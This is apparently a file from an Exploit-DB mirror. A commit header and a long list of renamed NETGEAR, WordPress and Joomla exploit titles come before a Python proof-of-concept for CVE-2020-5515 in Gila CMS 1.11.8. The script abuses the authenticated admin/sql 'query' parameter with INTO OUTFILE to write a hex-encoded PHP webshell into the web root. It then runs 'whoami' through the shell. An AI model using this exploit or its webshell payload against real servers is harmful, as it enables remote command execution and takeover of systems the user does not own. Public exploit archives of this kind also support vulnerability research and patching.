exploit-db-mirror/exploits/php/webapps/48590.py
Offensive Security 8fc6092de1 DB: 2020-06-17
4 changes to exploits/shellcodes

NETGEAR SSL312 Router - Denial of Service
Netgear SSL312 Router - Denial of Service

NETGEAR WGR614v9 Wireless Router - Denial of Service
Netgear WGR614v9 Wireless Router - Denial of Service

NETGEAR DG632 Router - Remote Denial of Service
Netgear DG632 Router - Remote Denial of Service

NETGEAR ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service
Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service

NETGEAR ProSafe - Denial of Service
Netgear ProSafe - Denial of Service

NETGEAR WGR614 - Administration Interface Remote Denial of Service
Netgear WGR614 - Administration Interface Remote Denial of Service

NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation
Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation

Outline Service 1.3.3  - 'Outline Service ' Unquoted Service Path
Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path

Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path

NETGEAR WG102 - Leaks SNMP Write Password With Read Access
Netgear WG102 - Leaks SNMP Write Password With Read Access

NETGEAR DG632 Router - Authentication Bypass
Netgear DG632 Router - Authentication Bypass

NETGEAR WNR2000 FW 1.2.0.8 - Information Disclosure
Netgear WNR2000 FW 1.2.0.8 - Information Disclosure

NETGEAR WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)
Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)

NETGEAR FM114P Wireless Firewall - File Disclosure
Netgear FM114P Wireless Firewall - File Disclosure

NETGEAR FM114P ProSafe Wireless Router - UPnP Information Disclosure
Netgear FM114P ProSafe Wireless Router - UPnP Information Disclosure

NETGEAR FM114P ProSafe Wireless Router - Rule Bypass
Netgear FM114P ProSafe Wireless Router - Rule Bypass

NETGEAR RP114 3.26 - Content Filter Bypass
Netgear RP114 3.26 - Content Filter Bypass

NETGEAR DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)
Netgear DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)

NETGEAR DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)
Netgear DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)

NETGEAR MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow
Netgear MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow

NETGEAR WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow
Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow

NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit)
Netgear ReadyNAS - Perl Code Evaluation (Metasploit)

NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting
Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting

NETGEAR WNR2000 - Multiple Information Disclosure Vulnerabilities
Netgear WNR2000 - Multiple Information Disclosure Vulnerabilities

NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities
Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities

NETGEAR D6300B - '/diag.cgi?IPAddr4' Remote Command Execution
Netgear D6300B - '/diag.cgi?IPAddr4' Remote Command Execution

NETGEAR NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)
Netgear NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)
NETGEAR JNR1010 ADSL Router - (Authenticated) Remote File Disclosure
NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure
Netgear JNR1010 ADSL Router - (Authenticated) Remote File Disclosure
Netgear WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure

NETGEAR WNR2000v5 - Remote Code Execution
Netgear WNR2000v5 - Remote Code Execution

NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)
Netgear R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)

NETGEAR WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)
Netgear WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)

NETGEAR DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)
Netgear DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)

NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)
Netgear - 'TelnetEnable' Magic Packet (Metasploit)

WordPress MU < 1.3.2 - active_plugins option Code Execution
WordPress MU < 1.3.2 - 'active_plugins' Code Execution

NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery
Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery

NETGEAR SPH200D - Multiple Vulnerabilities
Netgear SPH200D - Multiple Vulnerabilities

NETGEAR DGN1000B - Multiple Vulnerabilities
Netgear DGN1000B - Multiple Vulnerabilities

NETGEAR DGN2200B - Multiple Vulnerabilities
Netgear DGN2200B - Multiple Vulnerabilities

NETGEAR WNR1000 - Authentication Bypass
Netgear WNR1000 - Authentication Bypass

NETGEAR WPN824v3 - Unauthorized Configuration Download
Netgear WPN824v3 - Unauthorized Configuration Download

NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities
Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities

NETGEAR ProSafe - Information Disclosure
Netgear ProSafe - Information Disclosure

NETGEAR WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)
Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)

NETGEAR DGN2200 N300 Wireless Router - Multiple Vulnerabilities
Netgear DGN2200 N300 Wireless Router - Multiple Vulnerabilities

NETGEAR WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities
Netgear WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities

NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting
Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting

NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure
Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure

NETGEAR WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access
Netgear WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access

NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure
Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure

NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation
Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation

NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities
Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities

NETGEAR WNR1000v4 - Authentication Bypass
Netgear WNR1000v4 - Authentication Bypass

NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities
Netgear NMS300 ProSafe Network Management System - Multiple Vulnerabilities
NETGEAR R7000 - Command Injection
NETGEAR R7000 - Cross-Site Scripting
Netgear R7000 - Command Injection
Netgear R7000 - Cross-Site Scripting

NETGEAR Routers - Password Disclosure
Netgear Routers - Password Disclosure

NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution
Netgear DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution

NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution
Netgear DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution

NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery
Netgear DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery

Multiple  WordPress Plugins - Arbitrary File Upload
Multiple WordPress Plugins - Arbitrary File Upload

NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution
Netgear ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution

NETGEAR WiFi Router R6120 - Credential Disclosure
Netgear WiFi Router R6120 - Credential Disclosure

NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass
Netgear WiFi Router JWNR2010v5 / R6080 - Authentication Bypass

WordPress Plugin LearnDash  LMS 3.1.2 - Reflective Cross-Site Scripting
WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting

School File Management System 1.0  - 'username' SQL Injection
School File Management System 1.0 - 'username' SQL Injection

ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection
WordPress Plugin ChopSlider 3.4 - 'id' SQL Injection

Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection
WordPress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection

Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)
WordPress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)

Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation
WordPress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation

Joomla J2  Store 3.3.11 - 'filter_order_Dir'  SQL Injection (Authenticated)
Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)
Netgear R7000 Router - Remote Code Execution
Gila CMS 1.11.8 - 'query' SQL Injection
2020-06-17 05:02:00 +00:00


# Exploit Title: Gila CMS 1.11.8 - 'query' SQL Injection
# Date: 2020-06-15
# Exploit Author: Carlos Ramírez L. (BillyV4)
# Vendor Homepage: https://gilacms.com/
# Software Link: https://github.com/GilaCMS/gila/releases/tag/1.11.8
# Version: Gila 1.11.8
# Tested on: Gila 1.11.8
# CVE : CVE-2020-5515
import requests as req
import time as vremeto
import sys as sistemot
import re as regularno

if len(sistemot.argv) < 2:
    print("Usage: ./CVE_2020_5515.py ip:port")
    sistemot.exit(19)
else:
    ip = sistemot.argv[1]

# Session cookies of an already authenticated admin user (the admin/sql endpoint is authenticated)
cookies = {'PHPSESSID': 'r2k5bp52edr9ls36d35iohdlng', 'GSESSIONID': '21k2mbxockr9sf1v1agxkwpkt6ruzdl6vjz6fgmt7s0e72hlas'}
webpath = "/gila-1.11.8/admin/sql?query="
# The 'query' parameter is passed to the database unfiltered; INTO OUTFILE writes the result to disk
query1 = "SELECT id FROM user LIMIT 0,1 INTO OUTFILE "
localpath = "\'C://xampp//htdocs//"
shellname = "webshell.php\' "
query2 = "LINES TERMINATED BY "
print("[*] Injecting ")
# Hex-encoded PHP payload appended to the written file
cmdphp = "0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297"
cmdphp += "b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d"
cmdphp += "2824636d64293b206563686f20273c2f7072653e24636d643c7072653e273b2064696"
cmdphp += "53b207d203f3e"
url = 'http://' + ip + webpath + query1 + localpath + shellname + query2 + cmdphp
r = req.get(url, cookies=cookies)
vremeto.sleep(1)
print("[*] Executing")
r = req.get("http://" + ip + "/" + shellname + "?cmd=whoami")
print("You have a webshell in http://" + ip + "/" + shellname + "?cmd=command")